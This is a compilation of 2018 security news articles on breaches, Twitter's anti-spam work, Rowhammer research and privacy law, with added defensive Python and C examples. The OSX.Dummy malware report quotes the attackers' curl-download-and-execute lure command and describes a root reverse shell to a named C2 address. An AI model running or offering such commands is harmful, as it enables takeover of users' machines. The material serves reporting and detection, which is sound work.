Such detailed profiles could allow attackers to launch effective spear phishing campaigns.

The security expert promptly reported his findings to the FBI and to Exactis, which immediately secured the database.

Customers proposed a class action in the Florida federal court last week claiming that Exactis did not implement best practice guidelines to protect the data.


Recently discovered OSX.Dummy mac malware is targeting the cryptocurrency community
30.6.2018 securityaffairs Apple

The former NSA white hat hacker and malware researcher Patrick Wardle analyzed a new Mac malware dubbed OSX.Dummy that targets the cryptocurrency community.
The popular expert decided to analyze the malicious code after security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry to the SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
“In previous days we’ve seen multiple MacOS malware attacks, originating within crypto-related Slack or Discord chat groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

Wardle's intent was to demonstrate that Objective-See's tools can generically thwart this new threat even though it was undetected by all anti-virus software.


Verhoef noticed that the attack originated within crypto-related Slack or Discord chat groups, with the attackers impersonating admins or key people.

The attackers shared small code snippets like the following one, which results in downloading and executing a malicious binary:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Wardle noticed that the malicious binary is not signed, which means it would be blocked by Gatekeeper, but the attackers overcame this limitation by having the victims download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets the script to be owned by root:

# procInfo

monitoring for process events...

process start:
pid: 432
path: /usr/bin/sudo
args: (
"/usr/bin/sudo",
"-S",
"-p",
"#node-sudo-passwd#",
chown,
root,
"/tmp/script.sh"
)
It then changes the file's permissions to root by executing the sudo command, which requires the user to enter their password in the terminal.

The malicious code saves the password to /tmp/dumpdummy.

The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon.

The malware sets the RunAtLoad key to true, which means that the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted.

The script will attempt to connect to 185[.]243.115.230 on port 1337.
“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.

“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”

If the malware successfully connects to the C&C server (185[.]243.115.230:1337), the attacker will be able to arbitrarily execute commands as root on the target system.

Below are the key findings of Wardle's analysis of OSX.Dummy:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that’s dumb)
…and finally, the malware saves the user’s password to dumpdummy
“To check if you’re infected run KnockKnock as root (since the malware sets its components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh’” Wardle concluded.
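To turn the indicators above (RunAtLoad set to true, a Program of /var/root/script.sh, an unsigned launch item com.startup.plist) into a check that does not depend on KnockKnock, here is an added example; it is not Wardle's or Objective-See's code. The sample plists are constructed from the article's description, and the location prefixes treated as unusual and the KeepAlive key in the sample are assumptions.

```python
import plistlib
import sys
import tempfile
from pathlib import Path
from typing import List, Optional

# Assumption: locations from which a legitimate launch job would normally not execute.
SUSPICIOUS_PREFIXES = ("/var/root/", "/private/var/root/", "/tmp/", "/private/tmp/", "/Users/Shared/")


def program_of(plist: dict) -> Optional[str]:
    """Return the executable a launchd job runs: Program, else ProgramArguments[0]."""
    if isinstance(plist.get("Program"), str):
        return plist["Program"]
    args = plist.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        return args[0]
    return None


def assess(name: str, plist: dict) -> List[str]:
    """Return the reasons this job looks like OSX.Dummy-style persistence (empty list = nothing flagged)."""
    reasons: List[str] = []
    prog = program_of(plist)
    if prog is None:
        return reasons
    args = plist.get("ProgramArguments") or []
    targets = [prog] + [a for a in args[1:] if isinstance(a, str)]
    # Indicator 1: runs at boot from a location where unsigned scripts should not live.
    if plist.get("RunAtLoad") is True and any(t.startswith(SUSPICIOUS_PREFIXES) for t in targets):
        reasons.append(f"{name}: RunAtLoad job executing from an unusual location: {prog}")
    # Indicator 2: the file name Wardle reported for this malware.
    if any(t.endswith("script.sh") for t in targets):
        reasons.append(f"{name}: runs 'script.sh', the file name reported for OSX.Dummy")
    # Indicator 3: the launch item name Wardle reported.
    if name == "com.startup.plist" or plist.get("Label") == "com.startup":
        reasons.append(f"{name}: label 'com.startup' matches the reported OSX.Dummy launch item")
    return reasons


def assess_bytes(name: str, data: bytes) -> List[str]:
    """Parse a plist from bytes (XML or binary) and assess it."""
    plist = plistlib.loads(data)
    return assess(name, plist) if isinstance(plist, dict) else []


def scan_directory(directory: str) -> List[str]:
    """Parse every .plist in `directory` and collect findings; unreadable or malformed files are skipped."""
    findings: List[str] = []
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            findings.extend(assess_bytes(path.name, path.read_bytes()))
        except Exception:  # permission denied (root-only plists) or malformed plist
            continue
    return findings


# Constructed sample modelled on the article: Label com.startup, Program /var/root/script.sh, RunAtLoad true.
SAMPLE_DUMMY_PLIST = plistlib.dumps({
    "Label": "com.startup",
    "Program": "/var/root/script.sh",
    "RunAtLoad": True,
    "KeepAlive": True,  # assumed for the sample, not reported by the article
})
# Constructed benign job for comparison.
SAMPLE_BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
    "RunAtLoad": True,
})


def scan_samples() -> List[str]:
    """Write both constructed samples to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "com.startup.plist").write_bytes(SAMPLE_DUMMY_PLIST)
        Path(tmp, "com.example.backup.plist").write_bytes(SAMPLE_BENIGN_PLIST)
        return scan_directory(tmp)


if __name__ == "__main__":
    # Run as root so that root-only launch items are readable, as Wardle advises for KnockKnock.
    for d in sys.argv[1:] or ["/Library/LaunchDaemons", "/Library/LaunchAgents"]:
        for line in scan_directory(d):
            print(line)
```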


Twitter shared details about its strategy for fighting spam and bots
30.6.2018 securityaffairs Social

Twitter has provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platforms are a privileged tool for psyops and malicious campaigns; for this reason, Twitter rolled out new features to detect and prevent abuse.

Threat actors make extensive use of bots to spread propaganda and malicious links, and social media platforms are investing significant effort in threat mitigation.

Twitter claims that in May it challenged more than 9.9 million potentially automated accounts used for malicious activity every week, up from 6.4 million in December 2017.
The social media platform said that the security measures allowed it to drastically reduce the spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them shut down within a week or even within hours of being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bot activity by detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content.”
The company introduced measures to audit existing accounts and to control the creation of new ones.
Twitter is increasing checks on the sign-up process to make it difficult to register spam accounts, for example by requesting more interaction from the user, such as the confirmation of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection: its engineers are working to introduce measures that, once suspicious activity is detected, challenge the account owner with actions that require their interaction.


Adidas warns US consumers of a potential security breach
30.6.2018 securityaffairs Incident

The sportswear company Adidas announced that it has launched an investigation after learning of a potential security breach that could impact millions of its US customers.
Adidas published a security alert to warn that hackers may have stolen customer data from its US website.

The German sportswear company confirmed that attackers may have had unauthorized access to customer personal data, including addresses, email addresses, and encrypted passwords.

The company highlighted that neither financial nor fitness information was exposed.

“On June 26, adidas became aware that an unauthorized party claims to have acquired limited data associated with certain consumers.” states the data breach notification published by Adidas.

“According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords, Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.”


The company became aware of the security breach on 26 June and notified law enforcement of the data breach.

The firm is notifying the affected customers, who could be targeted by spear-phishing campaigns in the coming weeks.

US customers are urged to change their password and to remain vigilant against potential attacks.


Facebook Quiz app NameTests left 120 Million users’ data exposed online
30.6.2018 securityaffairs Social

A third-party quiz app called NameTests was found exposing the data of up to 120 million Facebook users.
A bug on Nametests.com exposed the data of over 120 million users who took personality quizzes on Facebook; the good news is that the flaw was addressed as part of Facebook's Data Abuse Bounty Program launched in April.


The issue resided in Nametests.com, which shared users' data with any third party that requested it.

The flaw was reported by the researcher Inti De Ceukelaire, who explained that when loading a personality test, the website displays personal information loaded from http://nametests.com/appconfig_user.

The data loaded from Nametests.com was wrapped in JavaScript, which means that it could be read by other websites.

“In a normal situation, other websites would not be able to access this information. Web browsers have mechanisms in place to prevent that from happening.” the researcher wrote in a blog post.

“Since NameTests displayed their user’s personal data in a JavaScript file, virtually any website could access it when they would request it,”

The expert set up a website that fetched data about the visitor from Nametests.com. In turn, Nametests.com provided an access token that could also be used to gain access to the visitor's posts, photos and friends, depending on the permissions granted.

“NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would only take one visit to our website to gain access to someone’s personal information for up to two months.” De Ceukelaire added.

Below is the video PoC published by the expert, showing how NameTests revealed a visitor's identity even after the app was deleted.


The expert also discovered that user information continued to be available through the website even after the application was deleted. To prevent their data from being leaked, users would have had to manually delete the cookies on their devices.

The issue was reported to Facebook's Data Abuse program on April 22, and a fix was rolled out on June 25.

According to Facebook, the bug could “have affected Facebook information people shared with nametests.com”; in response to the incident, the tech giant revoked the access tokens for everyone on Facebook who had signed up to use this app.

“It was reported by Inti De Ceukelaire and we worked with the app’s developer — Social Sweethearts — to address the website vulnerability he identified which could have affected Facebook information people shared with nametests.com.” reads a post published by Facebook.

“To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it.”
Facebook awarded the expert an $8,000 bounty instead of $4,000 because he chose to donate it to charity.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher concluded.


The popular online survey software Typeform suffered a security breach
30.6.2018 securityaffairs Incident

Typeform, the popular online survey platform, has suffered a data breach that exposed partial data of some users, no payment card data was stolen.

Typeform, the popular online survey platform, is the latest victim of a data breach. Typeform software is widely adopted by businesses worldwide to easily arrange surveys; it allows the easy creation of interfaces to collect user data.

The company has confirmed the security breach that exposed partial data of some users.

“On June 27, 2018, our engineering team became aware that an unknown third party gained access to our server and downloaded certain information. As a result of this breach, some data was compromised.” reads the data breach notification published by the company.

According to Typeform, no payment card data or password information for the website had been exposed in the security breach.

The Spanish firm discovered the intrusion on June 27th, and immediately launched an internal investigation.

The experts discovered that the attackers accessed company servers and downloaded a partial backup of data for surveys conducted before May 3rd, 2018.

The company identified the vulnerability exploited by the hackers and patched it within a few hours, then notified the affected users of the incident.

At this time there is no information about the flaw exploited by the hackers; the company highlighted that even if customers collected payments via Typeform's Stripe integration, the payment details they collected are safe.


One of Typeform's customers, the digital mobile bank Monzo, confirmed that personal data of about 20,000 people is likely to have been exposed due to the security breach.

“Our initial investigations suggest that some personal data of about 20,000 people is likely to have been included in the breach.” reads the security advisory published by Monzo.

“For the vast majority of people, this was just their email address. For a much smaller proportion of others, this may have included other data like their Twitter username or postcode. We’ve published a full breakdown at the bottom of this post,”

Unfortunately, the number of data breaches continues to increase, and a growing volume of personal details is flooding black marketplaces.

Yesterday the sportswear company Adidas announced a potential data breach affecting millions of its U.S. customers, while the global entertainment ticketing service Ticketmaster suffered the same problem.


Researchers Devise Rowhammer Attacks Against Latest Android Versions
29.6.2018 securityweek  Android  Attack 

A team of researchers from universities worldwide has devised a new set of DMA-based Rowhammer attacks against the latest Android OS, along with a lightweight defense to prevent such attacks on ARM-based devices.

Rowhammer is a vulnerability impacting dynamic random-access memory (DRAM) chips that can be abused to gain kernel privileges on Linux systems. Discovered in 2012 but documented only in 2014, the bug can also be exploited remotely using JavaScript or via graphics processing units (GPUs).

Last year, researchers from Graz University of Technology, the University of Pennsylvania (and University of Maryland), and University of Adelaide revealed a series of attack methods able to bypass existing defenses against Rowhammer.

Now, eight researchers from Vrije Universiteit Amsterdam, Amrita University India, UC Santa Barbara, and EURECOM propose RAMpage, a set of attacks that target the latest Android versions with a root exploit and app-to-app exploits that bypass all defenses.

In a research paper (PDF), they also propose GuardION, lightweight defenses that mitigate Rowhammer exploitation on ARM systems by isolating DMA buffers with DRAM-level guard rows.

Furthermore, the researchers claim that re-enabling higher order allocations, which Google disabled to prevent attacks, would improve system performance.

Rowhammer is a hardware bug that “consists of the leakage of charge between adjacent memory cells on a densely packed DRAM chip.” This means that, when a row of bits in the DRAM module is used, the neighboring rows are slightly affected, and attackers can abuse this to completely subvert a system’s security.

The issue is particularly serious on mobile devices, where hardware upgrades are not possible, the security researchers argue. They also note that existing software defenses are not effective and present attacks can circumvent all currently proposed and implemented defense techniques.

To exploit Rowhammer, an attacker needs to land a security-sensitive page in a vulnerable physical memory location and also needs to access the DRAM chip fast enough to hit the same rows before they are refreshed. They also have to determine the virtual addresses that map to the two physical rows adjacent to the victim row.

To mitigate the risks, Google disabled the contiguous heap, but left the system heap available. The company also reduced internal system heap pools to two and enforced that the system heap only returns memory pages from highmem.

By exhausting the system heap, the researchers were able to get contiguous pages and find exploitable bit flips via double-sided Rowhammer. The researchers then tricked the system into releasing pre-allocated cached memory, including the row with the vulnerable page, and developed a root exploit leveraging this attack technique.

The researchers also say it is possible to corrupt buffers belonging to another app or process, an attack scenario that could abuse privileged apps for increased damage. They also argue that an attacker could try to exhaust the Contiguous Memory Allocator (CMA) bit map, or to corrupt system memory from CMA-allocated memory. Such attacks, however, are technically challenging, the experts admit.

GuardION, the newly proposed mitigation against DMA-based Rowhammer exploits on mobile devices, focuses on limiting the capabilities of an attacker's uncached allocations. Fine-grained isolation, though expensive, can be applied to each DMA allocation: GuardION isolates buffers with two guard rows, one at the ‘top’ and another at the ‘bottom’.

“This enforces a strict containment policy in which bit flips that are triggered by reading from uncached memory cannot occur outside the boundaries of that DMA buffer. In effect, this design defends against Rowhammer by eradicating the ability of the attacker to inject bit flips in sensitive data,” the researchers claim.

The mitigation, however, is based on the premise that bit flips do not occur in memory pages physically located more than one row away from the aggressor rows. Such flips have never been reported before, and the nature of the Rowhammer effect itself makes them unlikely to ever occur.

According to the research paper, not only is GuardION’s performance impact negligible, but its integration with the current Android code base is rather easy. A prototype implementation contains only 844 lines of code and touches only 9 files in the Android source code. The researchers are in the process of submitting the patch to Google for adoption.


California, Home of Silicon Valley, Ramps Up Online Privacy Law
29.6.2018 securityweek  Privacy

California on Thursday passed a strict new law aimed at protecting people's privacy online, a move that promised to shift the terrain on which internet firms operate in the wake of recent scandals.

The bill, signed into law by Governor Jerry Brown, followed in the spirit of the General Data Protection Regulation, which recently took effect in Europe.

The legislation cut off an initiative that is heading for the ballot in this state in the fall.

It was crafted to ensure rights including knowing what personal information is collected by companies on the internet and whether it is sold, and to whom, according to the bill signed by Brown.

The law also gives people a right to "say no" to the sale of their personal information, and calls for them to be treated the same as anyone else online if they opt to restrict use of their data.

Internet businesses that receive "verifiable" requests by people to have their data deleted will be required to do so, with a list of exceptions that include keeping what is needed to complete transactions, detect security breaches, or protect against illegal activity.

"A consumer shall have the right, at any time, to direct a business that sells personal information about the consumer to third parties not to sell the consumer's personal information," the legislation said.

"This right may be referred to as the right to opt out."

Business home pages will be required to provide "clear and conspicuous" links titled "Do Not Sell My Personal Information" that take people to opt-out pages.

People whose personal information is stored unencrypted and not sufficiently protected were also given the right to pursue civil claims.

The shift both in Europe and California came after the harvesting of Facebook users' data by Cambridge Analytica, a US-British political research firm, for the 2016 US presidential election.

- Potential to spread -

Nonprofit advocacy group Consumer Watchdog called the California legislation "landmark reform" and branded it the toughest state privacy law in the US.

"Silicon Valley companies will very likely implement many of these reforms across their entire customer base, not just for Californians," said Consumer Watchdog president Jamie Court.

"California has led the way and Californians must be ever vigilant in the next year that the legislature does not undermine these protections at the behest of tech lobbyists and moguls."

The Internet Association, an industry lobbying group, expressed concerns about the law, saying there was a lack of public input as it was hurried through the legislative process.

"Data regulation policy is complex and impacts every sector of the economy, including the internet industry," association vice president of state government affairs Robert Callahan said in a statement posted on its website.

"That makes the lack of public discussion and process surrounding this far-reaching bill even more concerning."

Callahan contended that California policymakers will need to "correct the inevitable, negative policy and compliance ramifications this last-minute deal will create for California's consumers and businesses alike."

The list of Internet Association members includes titans such as Amazon, Facebook, Google, Microsoft, Netflix and Twitter.

During a meeting Thursday with reporters at Facebook's headquarters in Silicon Valley, chief operating officer Sheryl Sandberg said the leading social network supported the California legislation.


Former Equifax Manager Charged With Insider Trading
29.6.2018 securityweek  IT

US securities regulators announced insider trading charges on Thursday against a former Equifax manager who sold shares in the company before it disclosed a giant data breach.

Sudhakar Reddy Bonthu, a product development manager at Equifax, allegedly netted more than $75,000 after placing orders on September 1, 2017 betting that Equifax shares would fall, according to a complaint by the US Securities and Exchange Commission.

Six days later, the company announced one of the biggest data breaches ever, sending shares sharply lower.

"As we allege, Bonthu, who was entrusted with confidential information by his employer, misused that information to conclude that his company had suffered a massive data breach and then sought to illegally profit," said Richard Best, director of the SEC's Atlanta Regional Office.

"Corporate insiders simply cannot abuse their access to sensitive information and illegally enrich themselves."

Bonthu, 44, a resident of Georgia, settled the SEC civil charges and agreed to return his ill-gotten gains plus interest, the agency said.

Bonthu has also been charged in a parallel US criminal case by the Department of Justice, the SEC said.

Bonthu is the second Equifax defendant in an insider trading case after authorities in March brought criminal and civil charges against former Equifax executive Jun Ying.

Key personal data, including names, social security numbers and dates of birth, were pilfered from more than 140 million Americans in the Equifax hack.

On Wednesday, the company agreed to new oversight requirements under a consent order with eight state regulators, including financial regulatory bodies in New York, Georgia and California.


Google Expands Android's Compiler-Based Mitigations
29.6.2018 securityweek  Android

Google this week announced expanded compiler-based mitigations in Android P, in an attempt to make bugs harder to exploit and prevent specific types of issues from becoming vulnerabilities.

One of these is Control Flow Integrity (CFI), which represents a set of mitigations meant to “confine a program's control flow to a call graph of valid targets determined at compile-time.” Android already supports CFI implementation in select components, but the next platform release will expand that support, the search giant says.

“This implementation focuses on preventing control flow manipulation via indirect branches, such as function pointers and virtual functions,” Google explains.

The idea is to determine the set of valid branch targets at compile time, which shrinks the set of destinations an attacker can redirect control to, and to instrument indirect branches so that any runtime deviation from that statically determined set is detected, in which case the process aborts.

By restricting control flow to a small set of legitimate targets, Google attempts to make code-reuse attacks much harder to execute, while also making memory corruption vulnerabilities more difficult or even impossible to exploit.

CFI requires compiling with Link-Time Optimization (LTO), which also results in reduced binary size and improved performance, although compile time increases. According to Google, testing has revealed “negligible overhead to code size and performance.”

In Android P, CFI will be enabled by default widely within the media frameworks and other security-critical components, including NFC and Bluetooth.

Android P also expands the number of libraries that benefit from Integer Overflow Sanitization, which safely aborts process execution when an overflow is detected. This mitigates an entire class of memory corruption and information disclosure vulnerabilities.

Google has expanded the use of these sanitizers in the media framework with each release and also improved them to reduce performance impact.

“In testing, these improvements reduced the sanitizers' performance overhead by over 75% in Android's 32-bit libstagefright library for some codecs. Improved Android build system support, such as better diagnostics support, more sensible crashes, and globally sanitized integer overflow targets for testing have also expedited the rollout of these sanitizers,” the Internet company says.

Google decided to bring integer overflow sanitization to libraries where complex untrusted input is processed or security bulletin-level integer overflow flaws were reported. Thus, in Android P, the libui, libnl, libmediaplayerservice, libexif, libdrmclearkeyplugin, and libreverbwrapper libraries will benefit from these sanitizers.
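As an added illustration of the bug class that integer overflow sanitization targets (example code written for this page, not Google's or Android's own): a constructed, hypothetical chunk header whose unchecked size computation wraps in 32 bits, beside a checked version that uses the compiler builtin `__builtin_mul_overflow`. Building such code with Clang's `-fsanitize=unsigned-integer-overflow` (or `-fsanitize=signed-integer-overflow` for signed arithmetic) would abort at the wrapping multiplication in the unchecked function, which is exactly what the sanitizer adds; the checked function makes the same decision explicitly in source.

```c
/* Added example (not Google's or Android's code): the class of bug that
 * integer overflow sanitization catches, shown as an unchecked size
 * computation beside a checked one. The "chunk header" is constructed
 * here for illustration and is not a real media format. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical header describing a frame of width*height samples of
 * bytes_per_sample bytes each, as an untrusted parser would read it. */
struct chunk_header {
    uint32_t width;
    uint32_t height;
    uint32_t bytes_per_sample;
};

/* Unchecked: the product is computed in 32 bits and silently wraps, so a
 * header claiming 65536 x 65536 x 1 yields a 0-byte size; a buffer sized
 * from it would be overrun by the real payload. Unsigned wraparound is
 * defined behaviour in C, which is why the sanitizer has to be switched on
 * with -fsanitize=unsigned-integer-overflow to flag this line. */
uint32_t frame_bytes_unchecked(const struct chunk_header *h)
{
    return h->width * h->height * h->bytes_per_sample;
}

/* Checked: __builtin_mul_overflow (GCC and Clang) reports wraparound
 * instead of producing a wrapped value, and the caller rejects the chunk.
 * This is the same decision the sanitizer makes at runtime, but written
 * in source so it holds in every build. */
bool frame_bytes_checked(const struct chunk_header *h, size_t *out)
{
    uint32_t wh, total;
    if (__builtin_mul_overflow(h->width, h->height, &wh))
        return false;
    if (__builtin_mul_overflow(wh, h->bytes_per_sample, &total))
        return false;
    *out = total;
    return true;
}

/* Allocation path a parser would take: returns NULL for a rejected or
 * empty header rather than allocating a wrapped (too-small) buffer. */
uint8_t *alloc_frame(const struct chunk_header *h)
{
    size_t n;
    if (!frame_bytes_checked(h, &n) || n == 0)
        return NULL;
    return calloc(n, 1);
}

int main(void)
{
    /* Constructed inputs: one sane header, one crafted to wrap. */
    struct chunk_header sane = { 640, 480, 2 };
    struct chunk_header wraps = { 65536, 65536, 1 };
    size_t n;

    printf("sane:  unchecked=%u checked=%s\n", frame_bytes_unchecked(&sane),
           frame_bytes_checked(&sane, &n) ? "ok" : "rejected");
    printf("wraps: unchecked=%u checked=%s\n", frame_bytes_unchecked(&wraps),
           frame_bytes_checked(&wraps, &n) ? "ok" : "rejected");
    free(alloc_frame(&sane));
    return 0;
}
```

In a default build the unchecked function returns 0 for the crafted header without any diagnostic, which is why the page's per-library rollout of sanitizers matters: the compiler inserts the check at every such multiplication in the instrumented library, and a wrapping result becomes an abort rather than an undersized buffer.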

“Moving forward, we're expanding our use of these mitigation technologies and we strongly encourage vendors to do the same with their customizations,” Google notes.


Twitter shared details about its strategy for fighting spam and bots
29.6.2018 securityaffairs 
Social 

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platforms are a privileged tool for psyops and malicious campaigns; for this reason, Twitter rolled out new features to detect and prevent abuse.

Threat actors make heavy use of bots to spread propaganda and malicious links, and social media platforms are spending significant effort on mitigating these threats.

Twitter claims that in May it challenged more than 9.9 million potentially automated accounts used for malicious activity every week, a significant increase from 6.4 million in December 2017.
The social media platform said that the security measures allowed it to drastically reduce the spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them were shut down within a week or even within hours after being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bot activity by detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content.”
The company introduced measures to audit existing accounts and control the creation of new ones.
Twitter is increasing checks in the sign-up process to make it more difficult to register spam accounts, for example by requesting more interaction from the user, such as the confirmation of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is also investing in behavioral detection: its engineers are working on measures that, once suspicious activity is detected, challenge the account owner with actions that require their interaction.


Facebook, Google 'Manipulate' Users to Share Data Despite EU Law: Study
29.6.2018 securityweek  Privacy

Facebook and Google are pushing users to share private information by offering "invasive" and limited default options despite new EU data protection laws aimed at giving users more control and choice, a government study said Wednesday.

The Norwegian Consumer Council found that the US tech giants' privacy updates clash with the new General Data Protection Regulation (GDPR), which forces companies to clarify what choices people have when sharing private information.

"These companies manipulate us into sharing information about ourselves," the council's director of digital services, Finn Myrstad, said in a statement.

"(This) is at odds with the expectations of consumers and the intention of the new Regulation," the 2018 study, entitled "Deceived By Design", concluded.

Myrstad said the practices showed "a lack of respect for their users, and are circumventing the notion of giving consumers control of their personal data".

The case for the new laws has been boosted by the recent scandal over the harvesting of Facebook users' data by British consultancy Cambridge Analytica for the 2016 US presidential election.

Information for the report was collected from mid-April to early June, a few weeks after the EU rules came into force.

- 'Very few actual choices' -

The report exposed that Facebook and Google often set the least privacy-friendly option as a default and that users rarely change pre-selected settings.

Privacy-friendly choices "require more clicks and are often hidden," it said.

"In many cases, the services obscure the fact that users have very few actual choices, and that comprehensive data sharing is accepted just by using the service," the study said.

But Facebook on Wednesday denied covering up the options for users and said they had prepared for 18 months to meet the GDPR requirements.

"We have made our policies clearer, our privacy settings easier to find and introduced better tools for people to access, download, and delete their information," the company's spokesman told Norwegian public broadcaster NRK.

The EU has billed the GDPR as the biggest shake-up of data privacy regulations since the birth of the web.

The social media giant and Google separately already face their first official complaints under the new law after an Austrian privacy campaigner accused them of forcing users to give their consent to the use of their personal information.

Companies can be fined up to 20 million euros ($24 million) or four percent of annual global turnover for breaching the strict new data rules for the European Union, a market of 500 million people.


Twitter Unveils New Processes for Fighting Spam, Bots
29.6.2018 securityweek 
Social

Twitter this week shared some details on new processes designed to prevent malicious automation and spam, along with data on the positive impact of the measures implemented in recent months.

Spam and bots are highly problematic on Twitter, but the social media giant says it has rolled out some new systems that have helped its fight against these issues. The company claims that last month it challenged more than 9.9 million potentially spammy or automated accounts every week, up from 6.4 million in December last year.

Twitter says it now removes 214% more spam accounts compared to 2017. It also claims that recent changes have led to a significant drop in spam reports received from users, from 25,000 daily reports in March to 17,000 in May.

The company also reported suspending over 142,000 apps in the first quarter of 2018, more than half of which were shut down within a week or even within hours after being registered.

One measure implemented recently by Twitter involves updating account metrics in near-real time. Spam accounts and bots often follow other accounts in bulk and this type of behavior should quickly be caught by Twitter’s systems. However, the company has now also decided to remove follower and engagement counts from suspicious accounts that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” Twitter’s Yoel Roth and Del Harvey said in a blog post.

The company has also made some changes to its sign-up process to make it more difficult to register spam accounts. This includes requiring new accounts to confirm an email address or phone number.

Existing accounts are also being audited to ensure that they weren’t created using automation.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” Roth and Harvey explained. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

Finally, Twitter says it has expanded its malicious behavior detection systems with tests that can involve solving a reCAPTCHA or responding to a password reset request. Complex cases are passed on to Twitter employees for review.

Twitter also announced this week that users can configure a USB security key as part of the two-factor authentication (2FA) process.

On June 21, Twitter revealed that it entered an agreement to acquire Smyte, which specializes in safety, spam and security issues. By acquiring the company, the social media giant hopes to “improve the health of conversation on Twitter.”


Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.2018 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russia meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member of the US-led Five Eyes intelligence gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.


Ticketmaster Blames Third Party Over Data Breach
29.6.2018 securityweek  Incident

Ticketmaster UK has had the personal information of thousands of customers compromised. This may include name, address, email address, telephone number, payment details and Ticketmaster login details, the company said.

How many accounts have been compromised has not been specified, although the company says in a statement, "Less than 5% of our global customer base has been affected by this incident;" adding, "Customers in North America have not been affected."

